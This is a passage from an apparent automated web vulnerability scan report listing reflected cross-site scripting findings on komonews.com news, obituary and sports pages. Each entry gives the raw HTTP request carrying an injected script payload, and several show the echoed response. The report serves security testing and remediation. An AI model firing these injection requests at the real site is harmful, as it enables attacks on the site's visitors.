GET /news/offbeat/116749349.html?ref=guiltypleasures3a7f6"><script>alert(1)</script>b8ce1649d07 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53428
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Brazil fir ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/offbeat/116749349.html?ref=guiltypleasures3a7f6"><script>alert(1)</script>b8ce1649d07" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.472. http://www.komonews.com/news/tech/116596303.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/tech/116596303.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cabb5"><script>alert(1)</script>859f10f2154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/tech/116596303.html?cabb5"><script>alert(1)</script>859f10f2154=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 55388
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.473. http://www.komonews.com/news/tech/116609493.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/tech/116609493.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23646"><script>alert(1)</script>23fe8e6f7cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/tech/116609493.html?23646"><script>alert(1)</script>23fe8e6f7cb=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 56187
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
NASA to la ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116609493.html?23646"><script>alert(1)</script>23fe8e6f7cb=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.474. http://www.komonews.com/news/tech/116666119.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/tech/116666119.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d81"><script>alert(1)</script>9bc466a742f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/tech/116666119.html?f6d81"><script>alert(1)</script>9bc466a742f=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:44 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 56275
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Amazon off ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116666119.html?f6d81"><script>alert(1)</script>9bc466a742f=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.475. http://www.komonews.com/news/tech/116674969.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/tech/116674969.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb191"><script>alert(1)</script>87907b0c0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/tech/116674969.html?fb191"><script>alert(1)</script>87907b0c0d=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:40 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 55904
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
New EU ant ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116674969.html?fb191"><script>alert(1)</script>87907b0c0d=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.476. http://www.komonews.com/news/tech/116740874.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/tech/116740874.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ee4"><script>alert(1)</script>f02e797a14e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/tech/116740874.html?b8ee4"><script>alert(1)</script>f02e797a14e=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54983
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
'Gears of ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116740874.html?b8ee4"><script>alert(1)</script>f02e797a14e=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.477. http://www.komonews.com/news/tech/116748424.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/tech/116748424.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 888b6"><script>alert(1)</script>aef4ec57354 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/tech/116748424.html?888b6"><script>alert(1)</script>aef4ec57354=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u38-b3 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53866
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Apple to u ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/tech/116748424.html?888b6"><script>alert(1)</script>aef4ec57354=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.478. http://www.komonews.com/obits [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/obits
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4713"%3balert(1)//0545c331dec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4713";alert(1)//0545c331dec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /obits?b4713"%3balert(1)//0545c331dec=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Expires: Wed, 23 Feb 2011 22:17:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 23 Feb 2011 22:17:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 139592
...[SNIP]... <script type="text/javascript"> var current_full_uri = "/obits?&b4713";alert(1)//0545c331dec=1"; </script> ...[SNIP]...
The value of the chid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae44e"><script>alert(1)</script>c12346d1bee was submitted in the chid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /obits/?chid=directoryae44e"><script>alert(1)</script>c12346d1bee HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Expires: Wed, 23 Feb 2011 22:15:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 23 Feb 2011 22:15:12 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 47749
1.480. http://www.komonews.com/obits/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/obits/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d9d3"%3balert(1)//07f466772f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d9d3";alert(1)//07f466772f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /obits/?5d9d3"%3balert(1)//07f466772f8=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: sj-c14-r8-u22-b5 Content-Type: text/html;charset=utf-8 Expires: Wed, 23 Feb 2011 22:18:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 23 Feb 2011 22:18:41 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 139593
...[SNIP]... <script type="text/javascript"> var current_full_uri = "/obits/?&5d9d3";alert(1)//07f466772f8=1"; </script> ...[SNIP]...
1.481. http://www.komonews.com/opinion/kenschram/116741919.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/opinion/kenschram/116741919.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca69c"><script>alert(1)</script>9fc7fa49d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /opinion/kenschram/116741919.html?ca69c"><script>alert(1)</script>9fc7fa49d2e=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:09 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 53233
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
The Schram ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/opinion/kenschram/116741919.html?ca69c"><script>alert(1)</script>9fc7fa49d2e=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.482. http://www.komonews.com/sports/116570948.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/sports/116570948.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2daa5"><script>alert(1)</script>8d3a804d9c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sports/116570948.html?2daa5"><script>alert(1)</script>8d3a804d9c1=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r1-u24-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:22 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 57905
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Vargas, Fi ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116570948.html?2daa5"><script>alert(1)</script>8d3a804d9c1=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.483. http://www.komonews.com/sports/116572113.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/sports/116572113.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48b8c"><script>alert(1)</script>02763aa42e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sports/116572113.html?48b8c"><script>alert(1)</script>02763aa42e7=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u7-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 59866
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.484. http://www.komonews.com/sports/116601093.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/sports/116601093.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9352c"><script>alert(1)</script>525cb61d364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sports/116601093.html?9352c"><script>alert(1)</script>525cb61d364=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u7-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54767
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Formula On ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116601093.html?9352c"><script>alert(1)</script>525cb61d364=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.485. http://www.komonews.com/sports/116612208.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/sports/116612208.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f55"><script>alert(1)</script>e47ddffc89d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sports/116612208.html?d8f55"><script>alert(1)</script>e47ddffc89d=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b7 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 54887
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.486. http://www.komonews.com/sports/116713754.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/sports/116713754.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39190"><script>alert(1)</script>7100ee4ab24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
